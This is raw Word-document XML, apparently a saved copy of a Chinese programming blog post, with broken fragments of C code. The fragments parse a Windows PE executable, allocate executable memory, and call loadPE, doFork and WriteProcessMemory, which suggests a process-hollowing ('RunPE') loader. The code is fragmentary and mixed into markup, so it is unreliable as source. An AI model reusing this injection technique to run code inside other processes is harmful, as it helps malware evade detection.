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B89" w:rsidRPr="00277B89" w:rsidRDefault="00167374" w:rsidP="00CB1A2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4" w:history="1">
        <w:r w:rsidR="00277B89" w:rsidRPr="00277B89">
          <w:rPr>
            <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun" w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="36"/>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>动态加载</w:t>
        </w:r>
        <w:r w:rsidR="00277B89" w:rsidRPr="00277B8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EXE</w:t>
        </w:r>
        <w:r w:rsidR="00277B89" w:rsidRPr="00277B89">
          <w:rPr>
            <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun" w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="36"/>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>文件到内存执行</w:t>
        </w:r>
        <w:r w:rsidR="00277B89" w:rsidRPr="00277B8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</w:hyperlink>
    </w:p>
    <w:p w:rsidR="00277B89" w:rsidRPr="00277B89" w:rsidRDefault="00277B89" w:rsidP="00277B89">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6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" name="Picture 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" name="Picture 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loadEXE.cpp : Defines the entry point for the console application.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" name="Picture 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" name="Picture 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Proof-Of-Concept Code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" name="Picture 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Copyright (c) 2004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" name="Picture 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All rights reserved.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" name="Picture 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" name="Picture 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Permission is hereby granted, free of charge, to any person obtaining a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" name="Picture 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copy of this software and associated documentation files (the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0" name="Picture 1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"Software"), to deal in the Software without restriction, including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1" name="Picture 1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without limitation the rights to use, copy, modify, merge, publish,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" name="Picture 1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distribute, and/or sell copies of the Software, and to permit persons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3" name="Picture 1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to whom the Software is furnished to do so, provided that the above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" name="Picture 1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copyright notice(s) and this permission notice appear in all copies of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5" name="Picture 1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the Software and that both the above copyright notice(s) and this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6" name="Picture 1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permission notice appear in supporting documentation.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" name="Picture 1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" name="Picture 1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THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS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9" name="Picture 1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OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF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0" name="Picture 2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MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT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1" name="Picture 2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OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR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" name="Picture 2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HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL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" name="Picture 2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INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING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4" name="Picture 2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FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,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5" name="Picture 2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NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION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6" name="Picture 2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WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.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7" name="Picture 2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8" name="Picture 2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Usage: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9" name="Picture 2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loadEXE &lt;EXE filename&gt;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0" name="Picture 3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1" name="Picture 3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This will execute calc.exe in suspended mode and replace its image with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2" name="Picture 3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the new EXE's image.  The thread is then resumed, thus causing the new EXE to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3" name="Picture 3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execute within the process space of svchost.exe.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4" name="Picture 3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0" b="0"/>
            <wp:docPr id="35" name="Picture 3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6" name="Picture 3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7" name="Picture 3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 &lt;stdio.h&gt;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8" name="Picture 3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 &lt;windows.h&gt;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9" name="Picture 3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 &lt;tlhelp32.h&gt;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0" name="Picture 4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 &lt;psapi.h&gt;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1" name="Picture 4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2" name="Picture 4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PE_Header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43" name="_1962_2209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962_2209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4" name="Picture 4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signature;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5" name="Picture 4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machine;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6" name="Picture 4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numSections;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7" name="Picture 4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timeDateStamp;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8" name="Picture 4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pointerToSymbolTable;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9" name="Picture 4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numOfSymbols;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0" name="Picture 5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sizeOfOptionHeader;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1" name="Picture 5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characteristics;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2" name="Picture 52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3" name="Picture 5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4" name="Picture 5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PE_ExtHeader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55" name="_2233_4282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233_4282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6" name="Picture 5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magic;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7" name="Picture 5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majorLinkerVersion;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8" name="Picture 5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minorLinkerVersion;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9" name="Picture 5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sizeOfCode;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0" name="Picture 6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sizeOfInitializedData;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1" name="Picture 6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sizeOfUninitializedData;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2" name="Picture 6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addressOfEntryPoint;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3" name="Picture 6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baseOfCode;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4" name="Picture 6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baseOfData;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5" name="Picture 6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imageBase;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6" name="Picture 6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sectionAlignment;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7" name="Picture 6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fileAlignment;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8" name="Picture 6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majorOSVersion;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9" name="Picture 6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minorOSVersion;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0" name="Picture 7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majorImageVersion;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1" name="Picture 7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minorImageVersion;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2" name="Picture 7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majorSubsystemVersion;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3" name="Picture 7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minorSubsystemVersion;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4" name="Picture 7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reserved1;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5" name="Picture 7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sizeOfImage;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6" name="Picture 7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sizeOfHeaders;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7" name="Picture 7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checksum;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0" b="0"/>
            <wp:docPr id="78" name="Picture 7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subsystem;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9" name="Picture 7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DLLCharacteristics;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0" name="Picture 8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sizeOfStackReserve;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1" name="Picture 8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sizeOfStackCommit;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2" name="Picture 8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sizeOfHeapReserve;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3" name="Picture 8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sizeOfHeapCommit;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4" name="Picture 8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loaderFlags;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5" name="Picture 8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numberOfRVAAndSizes;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6" name="Picture 8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exportTableAddress;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7" name="Picture 8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exportTableSize;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8" name="Picture 8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importTableAddress;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9" name="Picture 8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importTableSize;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0" name="Picture 9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resourceTableAddress;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1" name="Picture 9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resourceTableSize;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2" name="Picture 9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exceptionTableAddress;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3" name="Picture 9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exceptionTableSize;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4" name="Picture 9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certFilePointer;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5" name="Picture 9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certTableSize;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6" name="Picture 9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relocationTableAddress;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7" name="Picture 9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relocationTableSize;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8" name="Picture 9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debugDataAddress;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9" name="Picture 9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debugDataSize;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00" name="Picture 10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archDataAddress;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01" name="Picture 10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archDataSize;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02" name="Picture 10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globalPtrAddress;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03" name="Picture 10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globalPtrSize;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04" name="Picture 10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TLSTableAddress;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05" name="Picture 10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TLSTableSize;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06" name="Picture 10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loadConfigTableAddress;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07" name="Picture 10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loadConfigTableSize;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08" name="Picture 10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boundImportTableAddress;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09" name="Picture 10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boundImportTableSize;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10" name="Picture 11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importAddressTableAddress;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11" name="Picture 11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importAddressTableSize;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12" name="Picture 11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delayImportDescAddress;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13" name="Picture 11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delayImportDescSize;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14" name="Picture 11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COMHeaderAddress;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15" name="Picture 11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COMHeaderSize;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16" name="Picture 11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reserved2;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17" name="Picture 11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reserved3;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18" name="Picture 118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19" name="Picture 11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0" name="Picture 12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1" name="Picture 12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SectionHeader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19050" t="0" r="9525" b="0"/>
            <wp:docPr id="122" name="_4308_4643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308_4643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3" name="Picture 12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sectionName[8];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4" name="Picture 12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virtualSize;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5" name="Picture 12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virtualAddress;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6" name="Picture 12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sizeOfRawData;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7" name="Picture 12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pointerToRawData;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8" name="Picture 12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pointerToRelocations;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9" name="Picture 12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pointerToLineNumbers;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30" name="Picture 13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numberOfRelocations;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31" name="Picture 13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numberOfLineNumbers;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32" name="Picture 13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characteristics;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33" name="Picture 133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34" name="Picture 13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35" name="Picture 13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MZHeader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136" name="_4663_5064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663_5064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37" name="Picture 13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signature;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38" name="Picture 13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partPag;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39" name="Picture 13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pageCnt;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0" name="Picture 14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reloCnt;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1" name="Picture 14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hdrSize;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2" name="Picture 14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minMem;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3" name="Picture 14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maxMem;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4" name="Picture 14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reloSS;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5" name="Picture 14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exeSP;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6" name="Picture 14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chksum;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7" name="Picture 14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exeIP;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8" name="Picture 14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reloCS;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9" name="Picture 14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tablOff;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50" name="Picture 15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overlay;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51" name="Picture 15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reserved[32];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52" name="Picture 15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offsetToPE;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53" name="Picture 153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54" name="Picture 15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55" name="Picture 15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56" name="Picture 15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ImportDirEntry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157" name="_5091_5206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5091_5206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58" name="Picture 15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DWORD importLookupTable;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59" name="Picture 15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DWORD timeDateStamp;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60" name="Picture 16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DWORD fowarderChain;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61" name="Picture 16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DWORD nameRVA;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62" name="Picture 16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DWORD importAddressTable;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63" name="Picture 163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64" name="Picture 16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65" name="Picture 16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0" b="0"/>
            <wp:docPr id="166" name="Picture 16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67" name="Picture 16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68" name="Picture 16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This function reads the MZ, PE, PE extended and Section Headers from an EXE file.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69" name="Picture 16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0" name="Picture 17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1" name="Picture 17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2" name="Picture 17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bool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readPEInfo(FILE *fp, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH,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3" name="Picture 17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SectionHeader **outSecHdr)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174" name="_5636_7143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5636_7143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5" name="Picture 17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fseek(fp, 0, SEEK_END);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6" name="Picture 17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fileSize = ftell(fp);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7" name="Picture 17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fseek(fp, 0, SEEK_SET);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8" name="Picture 17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9" name="Picture 17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(fileSize &lt;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sizeof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(MZHeader))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80" name="_5751_5807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5751_5807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1" name="Picture 18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printf("File size too small ");    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2" name="Picture 18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83" name="Picture 183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4" name="Picture 18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5" name="Picture 18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read MZ Header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6" name="Picture 18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MZHeader mzH;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7" name="Picture 18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fread(&amp;mzH,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sizeof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(MZHeader), 1, fp);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8" name="Picture 18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9" name="Picture 18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(mzH.signature != 0x5a4d)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MZ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0" name="_5921_5984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5921_5984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91" name="Picture 19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printf("File does not have MZ header ");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92" name="Picture 19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3" name="Picture 193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94" name="Picture 19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95" name="Picture 19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//printf("Offset to PE Header = %X ", mzH.offsetToPE);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96" name="Picture 19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97" name="Picture 19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((unsigned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)fileSize &lt; mzH.offsetToPE +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sizeof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(PE_Header))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8" name="_6112_6168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6112_616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99" name="Picture 19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printf("File size too small ");    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00" name="Picture 20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01" name="Picture 201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02" name="Picture 20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03" name="Picture 20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read PE Header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04" name="Picture 20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fseek(fp, mzH.offsetToPE, SEEK_SET);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05" name="Picture 20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PE_Header peH;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06" name="Picture 20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fread(&amp;peH,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sizeof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(PE_Header), 1, fp);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07" name="Picture 20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0" b="0"/>
            <wp:docPr id="208" name="Picture 20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//printf("Size of option header = %d ", peH.sizeOfOptionHeader);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09" name="Picture 20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//printf("Number of sections = %d ", peH.numSections);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10" name="Picture 21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11" name="Picture 21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(peH.sizeOfOptionHeader !=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sizeof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(PE_ExtHeader))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2" name="_6463_6529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6463_6529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13" name="Picture 21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printf("Unexpected option header size. ");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14" name="Picture 21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15" name="Picture 21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6" name="Picture 216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17" name="Picture 21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18" name="Picture 21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read PE Ext Header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19" name="Picture 21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PE_ExtHeader peXH;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0" name="Picture 22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1" name="Picture 22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fread(&amp;peXH,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sizeof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(PE_ExtHeader), 1, fp);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2" name="Picture 22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3" name="Picture 22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//printf("Import table address = %X ", peXH.importTableAddress);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4" name="Picture 22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//printf("Import table size = %X ", peXH.importTableSize);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5" name="Picture 22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//printf("Import address table address = %X ", peXH.importAddressTableAddress);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6" name="Picture 22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//printf("Import address table size = %X ", peXH.importAddressTableSize);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7" name="Picture 22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8" name="Picture 22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9" name="Picture 22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// read the sections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0" name="Picture 23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SectionHeader *secHdr =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SectionHeader[peH.numSections];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1" name="Picture 23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2" name="Picture 23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fread(secHdr,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sizeof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(SectionHeader) * peH.numSections, 1, fp);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3" name="Picture 23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4" name="Picture 23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*outMZ = mzH;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5" name="Picture 23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*outPE = peH;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6" name="Picture 23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*outpeXH = peXH;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7" name="Picture 23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*outSecHdr = secHdr;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8" name="Picture 23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9" name="Picture 23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40" name="Picture 240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41" name="Picture 24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42" name="Picture 24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43" name="Picture 24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44" name="Picture 24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45" name="Picture 24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This function calculates the size required to load an EXE into memory with proper alignment.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46" name="Picture 24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47" name="Picture 24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48" name="Picture 24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49" name="Picture 24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calcTotalImageSize(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,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50" name="Picture 25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SectionHeader *inSecHdr)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19050" t="0" r="9525" b="0"/>
            <wp:docPr id="251" name="_7579_8127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7579_8127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52" name="Picture 25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result = 0;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53" name="Picture 25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alignment = inpeXH-&gt;sectionAlignment;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54" name="Picture 25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55" name="Picture 25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(inpeXH-&gt;sizeOfHeaders % alignment == 0)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56" name="Picture 25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result += inpeXH-&gt;sizeOfHeaders;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57" name="Picture 25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58" name="_7728_7818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7728_781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59" name="Picture 25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val = inpeXH-&gt;sizeOfHeaders / alignment;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60" name="Picture 26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val++;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61" name="Picture 26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result += (val * alignment);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62" name="Picture 262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63" name="Picture 26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64" name="Picture 26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65" name="Picture 26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i = 0; i &lt; inPE-&gt;numSections; i++)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66" name="_7867_8108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7867_810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67" name="Picture 26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(inSecHdr[i].virtualSize)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68" name="_7901_8105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7901_8105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69" name="Picture 26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(inSecHdr[i].virtualSize % alignment == 0)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70" name="Picture 27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result += inSecHdr[i].virtualSize;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71" name="Picture 27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72" name="_8001_8101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8001_8101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73" name="Picture 27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val = inSecHdr[i].virtualSize / alignment;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74" name="Picture 27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val++;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75" name="Picture 27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result += (val * alignment);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76" name="Picture 276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77" name="Picture 277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78" name="Picture 278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79" name="Picture 27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80" name="Picture 28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result;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81" name="Picture 281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82" name="Picture 28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83" name="Picture 28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84" name="Picture 28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85" name="Picture 28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86" name="Picture 28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This function calculates the aligned size of a section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87" name="Picture 28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88" name="Picture 28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89" name="Picture 28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90" name="Picture 29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getAlignedSize(unsigned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curSize,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alignment)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291" name="_8491_8624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8491_8624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92" name="Picture 29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(curSize % alignment == 0)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0" b="0"/>
            <wp:docPr id="293" name="Picture 29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curSize;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94" name="Picture 29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95" name="_8549_8622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8549_8622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96" name="Picture 29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val = curSize / alignment;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97" name="Picture 29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val++;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98" name="Picture 29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(val * alignment);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99" name="Picture 299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00" name="Picture 300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01" name="Picture 30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02" name="Picture 30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03" name="Picture 30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04" name="Picture 30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05" name="Picture 30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This function loads a PE file into memory with proper alignment.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06" name="Picture 30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Enough memory must be allocated at ptrLoc.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07" name="Picture 30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08" name="Picture 30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09" name="Picture 30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10" name="Picture 31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bool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loadPE(FILE *fp, MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,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11" name="Picture 31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SectionHeader *inSecHdr, LPVOID ptrLoc)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312" name="_9087_10615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9087_10615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13" name="Picture 31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*outPtr = (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*)ptrLoc;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14" name="Picture 31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15" name="Picture 31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fseek(fp, 0, SEEK_SET);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16" name="Picture 31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headerSize = inpeXH-&gt;sizeOfHeaders;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17" name="Picture 31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18" name="Picture 31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certain PE files have sectionHeaderSize value &gt; size of PE file itself.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19" name="Picture 31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// this loop handles this situation by find the section that is nearest to the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20" name="Picture 32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// PE header.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21" name="Picture 32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22" name="Picture 32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i = 0; i &lt; inPE-&gt;numSections; i++)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23" name="_9418_9515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9418_9515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24" name="Picture 32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(inSecHdr[i].pointerToRawData &lt; headerSize)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25" name="Picture 32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headerSize = inSecHdr[i].pointerToRawData;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26" name="Picture 326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27" name="Picture 32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28" name="Picture 32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read the PE header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29" name="Picture 32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readSize = fread(outPtr, 1, headerSize, fp);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30" name="Picture 33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//printf("HeaderSize = %d ", headerSize);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31" name="Picture 33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(readSize != headerSize)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32" name="_9674_9762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9674_9762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33" name="Picture 33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printf("Error reading headers (%d %d) ", readSize, headerSize);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34" name="Picture 33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;    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9525" b="0"/>
            <wp:docPr id="335" name="Picture 335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36" name="Picture 33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37" name="Picture 33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outPtr += getAlignedSize(inpeXH-&gt;sizeOfHeaders, inpeXH-&gt;sectionAlignment);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38" name="Picture 33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39" name="Picture 33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read the sections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40" name="Picture 34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(i = 0; i &lt; inPE-&gt;numSections; i++)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41" name="_9905_10598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9905_1059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42" name="Picture 34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(inSecHdr[i].sizeOfRawData &gt; 0)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43" name="_9945_10359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9945_10359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44" name="Picture 34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toRead = inSecHdr[i].sizeOfRawData;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45" name="Picture 34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(toRead &gt; inSecHdr[i].virtualSize)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46" name="Picture 34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toRead = inSecHdr[i].virtualSize;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47" name="Picture 34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48" name="Picture 34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fseek(fp, inSecHdr[i].pointerToRawData, SEEK_SET);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49" name="Picture 34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readSize = fread(outPtr, 1, toRead, fp);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50" name="Picture 35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51" name="Picture 35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(readSize != toRead)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52" name="_10207_10275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0207_10275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53" name="Picture 35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printf("Error reading section %d ", i);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54" name="Picture 35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55" name="Picture 355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56" name="Picture 35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outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH-&gt;sectionAlignment);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57" name="Picture 357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58" name="Picture 35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59" name="_10370_10595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0370_10595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60" name="Picture 36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this handles the case where the PE file has an empty section. E.g. UPX0 section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61" name="Picture 36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        // in UPXed files.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62" name="Picture 36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63" name="Picture 36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(inSecHdr[i].virtualSize)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64" name="Picture 36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outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH-&gt;sectionAlignment);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65" name="Picture 365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66" name="Picture 366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67" name="Picture 36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68" name="Picture 36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69" name="Picture 369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70" name="Picture 37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71" name="Picture 37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72" name="Picture 37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FixupBlock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373" name="_10637_10689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0637_10689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74" name="Picture 37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pageRVA;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75" name="Picture 37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blockSize;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76" name="Picture 376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77" name="Picture 37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78" name="Picture 37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0" b="0"/>
            <wp:docPr id="379" name="Picture 37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80" name="Picture 38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81" name="Picture 38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This function loads a PE file into memory with proper alignment.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82" name="Picture 38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Enough memory must be allocated at ptrLoc.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83" name="Picture 38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84" name="Picture 38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85" name="Picture 38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86" name="Picture 38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doRelocation(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,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87" name="Picture 38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SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD newBase)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388" name="_11167_12154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1167_12154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89" name="Picture 38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(inpeXH-&gt;relocationTableAddress &amp;&amp; inpeXH-&gt;relocationTableSize)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90" name="_11237_12151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1237_12151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91" name="Picture 39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FixupBlock *fixBlk = (FixupBlock *)((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*)ptrLoc + inpeXH-&gt;relocationTableAddress);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92" name="Picture 39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delta = newBase - inpeXH-&gt;imageBase;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93" name="Picture 39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94" name="Picture 39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(fixBlk-&gt;blockSize)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95" name="_11401_12148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1401_1214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96" name="Picture 39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//printf("Addr = %X ", fixBlk-&gt;pageRVA);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97" name="Picture 39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        //printf("Size = %X ", fixBlk-&gt;blockSize);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98" name="Picture 39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99" name="Picture 39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numEntries = (fixBlk-&gt;blockSize -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sizeof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(FixupBlock)) &gt;&gt; 1;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00" name="Picture 40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//printf("Num Entries = %d ", numEntries);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01" name="Picture 40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02" name="Picture 40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*offsetPtr = (unsigned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short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*)(fixBlk + 1);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03" name="Picture 40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04" name="Picture 40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i = 0; i &lt; numEntries; i++)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05" name="_11717_12106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1717_12106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06" name="Picture 40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DWORD *codeLoc = (DWORD *)((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*)ptrLoc + fixBlk-&gt;pageRVA + (*offsetPtr &amp; 0x0FFF));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07" name="Picture 40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08" name="Picture 40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relocType = (*offsetPtr &amp; 0xF000) &gt;&gt; 12;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09" name="Picture 40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10" name="Picture 41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//printf("Val = %X ", *offsetPtr);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11" name="Picture 41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            //printf("Type = %X ", relocType);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12" name="Picture 41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13" name="Picture 41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(relocType == 3)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14" name="Picture 41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*codeLoc = ((DWORD)*codeLoc) + delta;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15" name="Picture 41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16" name="_12020_12084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2020_12084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17" name="Picture 41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printf("Unknown relocation type = %d ", relocType);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18" name="Picture 418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19" name="Picture 41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offsetPtr++;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9525" b="0"/>
            <wp:docPr id="420" name="Picture 420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21" name="Picture 42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22" name="Picture 42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fixBlk = (FixupBlock *)offsetPtr;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23" name="Picture 423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24" name="Picture 424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25" name="Picture 425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26" name="Picture 42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27" name="Picture 42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28" name="Picture 42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#define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TARGETPROC "calc.exe"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29" name="Picture 42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CHAR    szDefDir[] = "I:/MyProject/tools/Xptools";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30" name="Picture 43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//CHAR    szDeft[] = "E:/WINDOWS/system32/notepad.exe";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31" name="Picture 43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//CHAR    szDeft[] = "I:/MyProject/tools/Xptools/XPtools.exe";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32" name="Picture 43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//CHAR    szDeft[] = "I:/MyProject/Test/Calcu/debug/Calcu.exe";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33" name="Picture 43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CHAR    szDeft[] = "I:/MyProject/PCBTest/Bin/PCBTest.exe";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34" name="Picture 43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35" name="Picture 43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typedef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_PROCINFO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436" name="_12511_12548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2511_12548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37" name="Picture 43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DWORD baseAddr;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38" name="Picture 43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DWORD imageSize;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39" name="Picture 439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 PROCINFO;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40" name="Picture 44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41" name="Picture 44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42" name="Picture 44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43" name="Picture 44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44" name="Picture 44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45" name="Picture 44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Creates the original EXE in suspended mode and returns its info in the PROCINFO structure.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46" name="Picture 44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47" name="Picture 44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48" name="Picture 44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49" name="Picture 44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50" name="Picture 45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BOOL createChild(PPROCESS_INFORMATION pi, PCONTEXT ctx, PROCINFO *outChildProcInfo)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451" name="_12967_13698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2967_13698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52" name="_12987_12989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2987_12989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STARTUPINFO si = {0};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53" name="Picture 45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54" name="Picture 45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(CreateProcess(NULL, TARGETPROC,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55" name="Picture 45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NULL, NULL, 0, CREATE_SUSPENDED, NULL, szDefDir, &amp;si, pi))    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56" name="_13093_13681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3093_13681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57" name="Picture 45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ctx-&gt;ContextFlags=CONTEXT_FULL;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58" name="Picture 45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GetThreadContext(pi-&gt;hThread, ctx);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59" name="Picture 45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60" name="Picture 46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DWORD *pebInfo = (DWORD *)ctx-&gt;Ebx;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61" name="Picture 46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DWORD read;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0" b="0"/>
            <wp:docPr id="462" name="Picture 46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ReadProcessMemory(pi-&gt;hProcess, &amp;pebInfo[2], (LPVOID)&amp;(outChildProcInfo-&gt;baseAddr),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sizeof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(DWORD), &amp;read);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63" name="Picture 46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64" name="Picture 46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DWORD curAddr = outChildProcInfo-&gt;baseAddr;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65" name="Picture 46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MEMORY_BASIC_INFORMATION memInfo;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66" name="Picture 46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(VirtualQueryEx(pi-&gt;hProcess, (LPVOID)curAddr, &amp;memInfo,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sizeof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(memInfo)))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67" name="_13496_13578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3496_1357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68" name="Picture 46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(memInfo.State == MEM_FREE)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69" name="Picture 46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break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70" name="Picture 47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curAddr += memInfo.RegionSize;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71" name="Picture 471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72" name="Picture 47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outChildProcInfo-&gt;imageSize = (DWORD)curAddr - (DWORD)outChildProcInfo-&gt;baseAddr;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73" name="Picture 47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74" name="Picture 47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TRUE;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75" name="Picture 475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76" name="Picture 47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FALSE;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77" name="Picture 477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78" name="Picture 47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79" name="Picture 47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80" name="Picture 48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81" name="Picture 48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82" name="Picture 48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Returns true if the PE file has a relocation table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83" name="Picture 48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84" name="Picture 48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85" name="Picture 48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86" name="Picture 48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BOOL hasRelocationTable(PE_ExtHeader *inpeXH)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487" name="_14027_14132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4027_14132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88" name="Picture 48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(inpeXH-&gt;relocationTableAddress &amp;&amp; inpeXH-&gt;relocationTableSize)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89" name="_14097_14115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4097_14115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90" name="Picture 49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TRUE;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91" name="Picture 491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92" name="Picture 49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FALSE;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93" name="Picture 493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94" name="Picture 49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95" name="Picture 49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96" name="Picture 49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typedef DWORD (WINAPI *PTRZwUnmapViewOfSection)(IN HANDLE ProcessHandle, IN PVOID BaseAddress);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97" name="Picture 49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98" name="Picture 49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99" name="Picture 49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00" name="Picture 50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0" b="0"/>
            <wp:docPr id="501" name="Picture 50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To replace the original EXE with another one we do the following.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02" name="Picture 50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1) Create the original EXE process in suspended mode.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03" name="Picture 50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2) Unmap the image of the original EXE.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04" name="Picture 50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3) Allocate memory at the baseaddress of the new EXE.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05" name="Picture 50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4) Load the new EXE image into the allocated memory.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06" name="Picture 50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5) Windows will do the necessary imports and load the required DLLs for us when we resume the suspended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07" name="Picture 50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   thread.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08" name="Picture 50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09" name="Picture 50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When the original EXE process is created in suspend mode, GetThreadContext returns these useful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10" name="Picture 51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register values.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11" name="Picture 51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EAX - process entry point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12" name="Picture 51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EBX - points to PEB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13" name="Picture 51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14" name="Picture 51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So before resuming the suspended thread, we need to set EAX of the context to the entry point of the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15" name="Picture 51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new EXE.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16" name="Picture 51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17" name="Picture 51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//**********************************************************************************************************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18" name="Picture 51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19" name="Picture 51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doFork(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,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20" name="Picture 52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SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD imageSize)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521" name="_15285_19028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5285_19028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22" name="_15305_15307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5305_15307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STARTUPINFO si = {0};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23" name="Picture 52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PROCESS_INFORMATION pi;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24" name="Picture 52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CONTEXT ctx;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25" name="Picture 52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PROCINFO childInfo;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26" name="Picture 52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27" name="Picture 52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(createChild(&amp;pi, &amp;ctx, &amp;childInfo))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28" name="_15413_18972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5413_18972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    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29" name="Picture 52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printf("Original EXE loaded (PID = %d). ", pi.dwProcessId);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30" name="Picture 53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printf("Original Base Addr = %X, Size = %X ", childInfo.baseAddr, childInfo.imageSize);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31" name="Picture 53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32" name="Picture 53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LPVOID v = (LPVOID)NULL;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33" name="Picture 53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34" name="Picture 53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(inpeXH-&gt;imageBase == childInfo.baseAddr &amp;&amp; imageSize &lt;= childInfo.imageSize)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35" name="_15684_16051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5684_16051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36" name="Picture 53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if new EXE has same baseaddr and is its size is &lt;= to the original EXE, just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37" name="Picture 53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        // overwrite it in memory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38" name="Picture 53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v = (LPVOID)childInfo.baseAddr;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39" name="Picture 53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DWORD oldProtect;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40" name="Picture 54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VirtualProtectEx(pi.hProcess, (LPVOID)childInfo.baseAddr, childInfo.imageSize, PA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GE_EXECUTE_READWRITE, &amp;oldProtect);        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41" name="Picture 54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42" name="Picture 54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printf("Using Existing Mem for New EXE at %X ", (unsigned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)v);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43" name="Picture 543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44" name="Picture 54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45" name="_16062_16670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6062_16670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46" name="Picture 54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get address of ZwUnmapViewOfSection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47" name="Picture 54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PTRZwUnmapViewOfSection pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection");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48" name="Picture 54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49" name="Picture 54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try to unmap the original EXE image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50" name="Picture 55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(pZwUnmapViewOfSection(pi.hProcess, (LPVOID)childInfo.baseAddr) == 0)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51" name="_16373_16666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6373_16666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52" name="Picture 55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allocate memory for the new EXE image at the prefered imagebase.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53" name="Picture 55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v = VirtualAllocEx(pi.hProcess, (LPVOID)inpeXH-&gt;imageBase, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);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54" name="Picture 55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(v)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55" name="Picture 55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printf("Unmapped and Allocated Mem for New EXE at %X ", (unsigned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)v);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56" name="Picture 556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57" name="Picture 557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58" name="Picture 55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59" name="Picture 55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(!v &amp;&amp; hasRelocationTable(inpeXH))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60" name="_16714_17211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6714_17211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61" name="Picture 56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if unmap failed but EXE is relocatable, then we try to load the EXE at another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62" name="Picture 56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        // location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63" name="Picture 56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v = VirtualAllocEx(pi.hProcess, (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*)NULL, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);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64" name="Picture 56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(v)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65" name="_16939_17207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6939_17207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66" name="Picture 56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printf("Allocated Mem for New EXE at %X. EXE will be relocated. ", (unsigned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long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)v);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67" name="Picture 56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68" name="Picture 56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we've got to do the relocation ourself if we load the image at another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69" name="Picture 56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            // memory location    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70" name="Picture 57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doRelocation(inMZ, inPE, inpeXH, inSecHdr, ptrLoc, (DWORD)v);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71" name="Picture 571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72" name="Picture 572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73" name="Picture 57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74" name="Picture 57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printf("EIP = %X ", ctx.Eip);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75" name="Picture 57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printf("EAX = %X ", ctx.Eax);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76" name="Picture 57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printf("EBX = %X ", ctx.Ebx);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EBX points to PEB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77" name="Picture 57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printf("ECX = %X ", ctx.Ecx);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78" name="Picture 57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printf("EDX = %X ", ctx.Edx);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79" name="Picture 57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0" b="0"/>
            <wp:docPr id="580" name="Picture 58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(v)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81" name="_17412_18849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7412_18849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        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82" name="Picture 58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printf("New EXE Image Size = %X ", imageSize);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83" name="Picture 58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84" name="Picture 58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patch the EXE base addr in PEB (PEB + 8 holds process base addr)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85" name="Picture 58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DWORD *pebInfo = (DWORD *)ctx.Ebx;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86" name="Picture 58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DWORD wrote;                    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87" name="Picture 58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WriteProcessMemory(pi.hProcess, &amp;pebInfo[2], &amp;v,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sizeof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(DWORD), &amp;wrote);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88" name="Picture 58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89" name="Picture 58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patch the base addr in the PE header of the EXE that we load ourselves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90" name="Picture 59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PE_ExtHeader *peXH = (PE_ExtHeader *)((DWORD)inMZ-&gt;offsetToPE +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sizeof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(PE_Header) + (DWORD)ptrLoc);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91" name="Picture 59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peXH-&gt;imageBase = (DWORD)v;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92" name="Picture 59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93" name="Picture 59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(WriteProcessMemory(pi.hProcess, v, ptrLoc, imageSize, NULL))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594" name="_17959_18746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7959_18746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{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95" name="Picture 59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printf("New EXE image injected into process. ");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96" name="Picture 59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97" name="Picture 59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ctx.ContextFlags=CONTEXT_FULL;            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98" name="Picture 59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//ctx.Eip = (DWORD)v + ((DWORD)dllLoaderWritePtr - (DWORD)ptrLoc);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99" name="Picture 59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//ctx.Eip = 0x007B9640;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00" name="Picture 60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01" name="Picture 60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((DWORD)v == childInfo.baseAddr)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02" name="_18197_18304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8197_18304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03" name="Picture 60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ctx.Eax = (DWORD)inpeXH-&gt;imageBase + inpeXH-&gt;addressOfEntryPoint;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eax holds new entry point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04" name="Picture 604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05" name="Picture 60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06" name="_18319_18518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8319_1851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07" name="Picture 60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in this case, the DLL was not loaded at the baseaddr, i.e. manual relocation was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08" name="Picture 60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                    // performed.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09" name="Picture 60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ctx.Eax = (DWORD)v + inpeXH-&gt;addressOfEntryPoint;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 eax holds new entry point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10" name="Picture 610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11" name="Picture 61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12" name="Picture 61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printf("********&gt; EIP = %X ", ctx.Eip);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13" name="Picture 61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printf("********&gt; EAX = %X ", ctx.Eax);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14" name="Picture 61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15" name="Picture 61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SetThreadContext(pi.hThread,&amp;ctx);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16" name="Picture 61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17" name="Picture 61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ResumeThread(pi.hThread);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18" name="Picture 61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printf("Process resumed (PID = %d). ", pi.dwProcessId);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19" name="Picture 619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20" 